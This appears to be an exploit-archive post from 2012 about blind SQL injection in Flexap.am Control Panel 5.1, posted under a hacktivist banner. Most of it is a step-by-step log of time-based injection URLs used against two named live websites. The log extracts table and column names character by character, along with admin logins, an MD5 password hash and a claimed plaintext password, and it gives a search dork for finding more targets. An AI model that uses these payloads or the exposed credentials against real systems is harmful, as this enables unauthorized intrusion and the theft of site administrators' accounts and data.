what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flexap.am Control Panel 5.1 Blind SQL Injection

Flexap.am Control Panel 5.1 Blind SQL Injection
Posted Sep 3, 2012
Authored by Akastep

Flexap.am Control Panel version 5.1 suffer from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection
SHA-256 | affb027023e9cdd295090a22d861742d331f68bea85915f81cc6f4a624a6658d

Flexap.am Control Panel 5.1 Blind SQL Injection

Change Mirror Download
=====================================================
Vulnerable software: Control Panel version 5.1
Vendor: http://www.flexap.am/
Vuln type: Blind SQL Injection
Software License: Commercial
Software: Control Panel version 5.1
Discovered and Exploited in Wild
=====================================================
Dork: Developed by flexap.am

=====================================================


************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************



=====================================================




http://dua.am/cms <=Admin panel

Real exploitation example:

Time Based Always RuleZ!

//TRUE

http://www.dua.am/am/news/50'or sleep(10)-- and 5='5/

cms: http://www.dua.am/



//TRUE

www.dua.am/am/news/50' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5




logini cekek:


http://www.dua.am/am/news/50%27%20or%20%28select%20if%28substr%28%60ulist_login%60,1,1%29=%27a%27,sleep%281%29,0%29%20from%20ulist%20limit%201%29--%20AnD%20%205=%275

1-ci simvol:


a

//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5



2-ci simvol: d

http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5


3-cu simvol: m

http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5


4-cu simvol: d


http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,4,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5



5-ci simvol: u


http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,5,1)='u',sleep(1),0) from ulist limit 1)-- AnD 5='5


6-ci simvol: a


http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,6,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5


Login: admdua


//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,15)='admdua',sleep(1),0) from ulist limit 1)-- AnD 5='5




Passi cekmeye getdik!



Pass deyesen ele budur:D
http://www.dua.am/am/news/50' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD 5='5


pass: Massword


mogin:Massword

===================================================================

Next another Demo:


Adminka: http://mkuzak.am/cms/


//TRUE
http://www.mkuzak.am/am/news/85%27%20or%20sleep%2810%29--%20and%205=%275/



//TRUE
http://www.mkuzak.am/am/news-8%27%20or%20sleep%281%29--%20and%205=%275/



Developed by <a href="http://www.flexap.am"


Bele olmalidir:




http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD 5='5


24 table varimizdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='24',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD 5='5


1-ci tablein adi 8 simvolluqdur:


//TRUE

Cekek


1-ci tablein adinin 1ci herfi: c


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5


2-ci simvolu (1-ci tablein adinin) : a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5

3-cu simvolu: t

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5



Category?

Yoxlayaq:

1-ci tablein adi: category
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,12)='category',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5



Ok indi qisaltmaga calisaq metodu:

pattern: adm
user

uzre:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)>'10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,3)='adm',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5



adm uzre butun neticeler LIMIT offsetlerde hamisi FALSE

qaldi user uzre. Edit: Ele user uzre de netice falsedir butun cehdlerde.


cms uzre axtaraq.


(select if(substr(table_name,1,3)='acms',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


Alinmasa isimiz uzanir.




ele uzandida isimiz icini sikim!



2-ci table name: 6 simvol uzunluqludur:



http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='6',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


Cekek bu sikilmisi de.


1-ci simvolu: c

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5

2-ci simvolu: o

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='o',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5


config?

2ci table name config:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,8)='config',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5



=======================================================================
3-cu table name: 3 simvol:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='3',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5

1-ci simvolu: f


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5



2-ci simvolu: a


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5


3-cu simvolu: q

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='q',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5


3-cu table name: faq

======================================================================


4-cu table name: 15 simvol uzunluqludur:




http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='15',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5


1-ci simvolu: f

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5

2-ci simvolu:


a

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5


sikdirecek bu table
=======================================================================


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

u herfine nese verir.


10 simvolludur:


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5


1-ci simvolu: u

2-ci simvolu: l
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

3-cu simvolu: i

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='i',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

4-cu simvol: s

s

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,4,1)='s',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5


5-ci simvolu: t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,5,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

6-ci simvol: _

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,6,1)='_',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

7-ci simvol: t

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,7,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5


8-ci simvol: y

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,8,1)='y',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

9-cu simvol: p

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,9,1)='p',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5

10-ci simvol:

table_name: ulist_type

===================================================================================================================
novbeti table:
//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 22,1)-- AnD 5='5

Bu da
//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 21,1)-- AnD 5='5



Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 20,1)-- AnD 5='5


Bu da

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5



============================= birinci herfi u olmaqla cemi 5 simvoldan ibaretdir. May be users?======================

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='5',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5


2-ci herfi: l

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,6)='ulist',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5


TABLE_NAME ulist

0x756C697374




http://www.mkuzak.am/am/news/1' or (select if(count(*)='1',sleep(1),0) from ulist)-- AnD 5='5



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(*)='2',sleep(1),0) from ulist)-- AnD 5='5

Ola bilsin ele budur cms-in adminkasina girmek ucun table
2 yazi var orda

COlumnlarina baxaq gorek ne veziyyetdedir.



http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='1',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD 5='5

ulist tableinda 8 column var:

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD 5='5

1-ci column name: 8 simvoldan ibaretdir

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

ulist tableinda 1-ci colum namein 1-ci simvolu: u

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,1)='u',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

2-ci simvolu: l

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,2,1)='l',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


3-cu simvolu: i


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,3,1)='i',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


4-cu simvolu: s

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,4,1)='s',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

5-ci simvolu: t

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,5,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5

6-ci simvol: _


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,6,1)='_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


1-ci column name full sekilde:

ulist_id
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,12)='ulist_id',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5


column prefix ulist_ dir demeli:


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,6)='ulist_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5


Getdik bu sikilmis 2-ci columnu cekmeye:

name Uzunlugu 13 simvoldur:


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='13',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5



http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5


hal hazirda bu sekildedir:

ulist_t



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='y',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5

hal hazirda bu sekildedir:

ulist_typeXXX


axira getmirem imho sikdirmelidir bu column name

Novbeti column blyaaaaaaaaaaaaaaaaaaaaaa:(



============================================

3-cu column:

10 simvoldur name length
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='10',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5



//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='n',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5

ulist_n



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='a',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5

ulist_na



//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,9,1)='m',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5

ulist_nam






http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,10,1)='e',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5


ulist_name


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,11)='ulist_name',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5


==============================================================


Novbeti column:

11 simvolludur column name length

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='11',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5


Prefixi: ulist_ (-6)

Offset 7 den baslanmalidir substr()-de


//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5

ulist_login



password-da cixsa sikmeye basliyardiq blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:(



Deyesen artiq duz tutmusam bunu:


http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='14',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD 5='5

Yeah!

Sikdik!

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,15)='ulist_password',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD 5='5


ulist_password


Neyimiz var:

ulist table-i

hemin tableda:

ulist_login
ulist_password

columnlari


Basliyaq...




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,15)='admin',sleep(1),0) from ulist limit 1)-- AnD 5='5



select length(`ulist_login`) from ulist limit 1


1-ci login name 9 simvoldan ibaretdir:

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5


--------------------------------------------------------------------------------------------------------------------------------------------------------------
Loginin 1-ci simvolu: a

//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5



2ci simvolu: d

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5

3cu simvol: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5

4-cu simvol: m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5

5-ci simvol:


Login bu ola biler: admmkuzak


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,11)='admmkuzak',sleep(1),0) from ulist limit 1)-- AnD 5='5





Getdik passi firlatmaga...


Amma 1-ci sifrelenme algosunu yoxlayaq.

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD 5='5


//TRUE


MD5 SIFRELENME ALGOSU:

http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD 5='5




http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='0',sleep(1),0) from ulist limit 1)-- AnD 5='5




admmkuzak adli soska xacikin parolu:


================================================

1-ci simvol: 9


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

2-ci simvol: 5


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

3-cu simvol: 7


//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

4-cu simvol: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='8',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

5-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='f',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================

6-ci simvol: 5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

7-ci simvol: a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


8-ci simvol: a

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5




================================================

9-cu simvol: 4


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================

10-cu simvol: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='2',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

11-ci simvol: 7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

12-ci simvol: b (yoxla sonra)

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='b',sleep(1),0) from ulist limit 1)-- AnD 5='5




================================================

13-cu simvol: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='0',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

14-cu simvol: 7

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

15-ci simvol: b (yoxla sonra)


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='b',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

16-ci simvol: d

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


17-ci simvol: d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


18-ci simvol: 3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='3',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


19-cu simvol: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


20-ci simvol: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='8',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

21-ci simvol: 5

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================
yoxla sonra
22-ci simvol: 4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


23-cu simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================
yoxla sonra


24-cu simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='f',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

25-ci simvol: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================


26-ci simvol: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='2',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

27-ci simvol: 9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================
yoxla sonra
28-ci simvol: a


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================

29-cu simvol: 4

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================

30-cu simvol: e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='e',sleep(1),0) from ulist limit 1)-- AnD 5='5

================================================


31-ci simvol: 3


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1)-- AnD 5='5



================================================

32-ci simvol: 1


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='1',sleep(1),0) from ulist limit 1)-- AnD 5='5


================================================
Login: admmkuzak

MD5 HASH: 9578f5aa427b07bdd3a8549f929a4e31


PASS: Massword
Yoxlaya hashi:

//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD 5='5


Blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa http://www.mkuzak.am/cms/ de deyir parol sehvdir:(


Belke role yoxdur bu userde?


2-ci user de olmalidir bu table da.


Variant yoxdur cekek:*(




Ikinci user name ucun:


http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='5',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




2-ci userin logininin

1-ci herfi:


m

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='m',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


2-ci herfi: o


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='o',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


3-cu herfi: g

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='g',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


4-cu herfi: i


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='i',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



5-ci simvol: n



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,5,1)='n',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



umumi username ikinci user ucun:


mogin

Yoxlayaq?


//TRUE


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,6)='mogin',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




Passi getdik: Cekmeye yene blyaaaaaaaaaaaaaaaaa :*(


================================================

1-ci simvol: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

2-ci simvol: 7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================
yoxla sonra:
3-cu simvol: 9



http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

4-cu simvol: d


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='d',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

5-ci simvol: 2

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================


yoxla mutlwq
6-ci simvol: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================





7-ci simvol: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5





================================================
yoxla sonra

8-ci simvol: 1

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='1',sleep(1),0) from ulist limit 1,1)-- AnD 5='5




================================================


9-cu simvol: 5


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='5',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================
10-cu simvol: e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

11-ci simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5


================================================

12-ci simvol: 9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

13-cu simvol: c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD 5='5



================================================

14-cu simvol: a


